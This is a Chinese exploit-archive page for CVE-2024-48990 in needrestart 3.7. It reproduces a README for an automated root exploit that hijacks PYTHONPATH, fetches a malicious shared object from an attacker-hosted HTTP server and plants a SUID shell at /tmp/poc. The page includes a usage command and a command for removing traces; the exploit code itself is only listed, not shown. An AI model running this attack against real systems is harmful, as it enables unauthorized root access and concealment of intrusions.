关联漏洞
标题:needrestart 安全漏洞 (CVE-2024-48990)描述:needrestart是liske个人开发者的一款用于检查升级后需要重新启动哪些守护进程的工具。 needrestart 3.8之前版本存在安全漏洞,该漏洞源于允许本地攻击者通过诱骗needrestart使用攻击者控制的PYTHONPATH环境变量运行Python解释器,并以root身份执行任意代码。
描述
Automated local privilege escalation exploit for CVE-2024-48990 (needrestart v3.7), leveraging PYTHONPATH hijacking to gain root access.
介绍
# CVE-2024-48990 PYTHONPATH Hijack - Privilege Escalation Exploit
This tool automates the exploitation of a privilege escalation vulnerability in `needrestart` version 3.7, identified as **CVE-2024-48990**.
It achieves root execution by leveraging the insecure use of the `PYTHONPATH` environment variable when `needrestart` scans Python processes.
## Summary
The exploit works by:
1. Compiling a malicious shared object (`__init__.so`) that is triggered on import.
2. Serving the `.so` via a local HTTP server.
3. Connecting to the target via SSH and preparing a malicious `PYTHONPATH` environment.
4. Launching a Python bait process that continuously imports `importlib`.
5. Running `needrestart`, which inherits the manipulated `PYTHONPATH`, loads the malicious module, and executes the payload as root.
6. The payload creates a SUID binary (`/tmp/poc`), allowing root shell access.
## Usage
Run the exploit from your attacker machine:
python3 exploit.py --user <ssh_user> --host <target_ip> --att-ip <attacker_ip> --ssh-pass <ssh_password>
Parameters:
- --user SSH username on the target
- --host Target IP address
- --att-ip Attacker IP (used for hosting the payload)
- --ssh-pass SSH password (omit if using SSH keys)
- --http-port Optional HTTP port (default: 8000)
## CVE
- **CVE ID:** [CVE-2024-48990](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-48990)
- **Affected Software:** `needrestart` version 3.7
- **Vulnerability Type:** Insecure environment variable handling
- **Impact:** Local privilege escalation to root
## Cleanup
To remove exploit traces from the target:
rm -rf /tmp/malicious /tmp/poc /tmp/exploit.sh
## Requirements
### Attacker machine:
- Python 3
- `pexpect` (`pip3 install pexpect`)
- `gcc` (for compiling the payload)
- Open SSH access to the target
- `python3 -m http.server` (automatically started by the script)
### Target machine:
- A vulnerable version of `needrestart` (v3.7)
- A non-root user with `sudo` NOPASSWD rights for `/usr/sbin/needrestart`
- Python 3 and `curl` installed
## Disclaimer
This tool is provided for educational and authorized security testing purposes only.
Do not use it on systems you do not own or without explicit permission.
文件快照
[4.0K] /data/pocs/4e67781a5c3c59dafd3a83461fb54c9d6a9b0923
├── [4.3K] exploit.py
├── [1.0K] LICENSE
└── [2.2K] README.md
1 directory, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。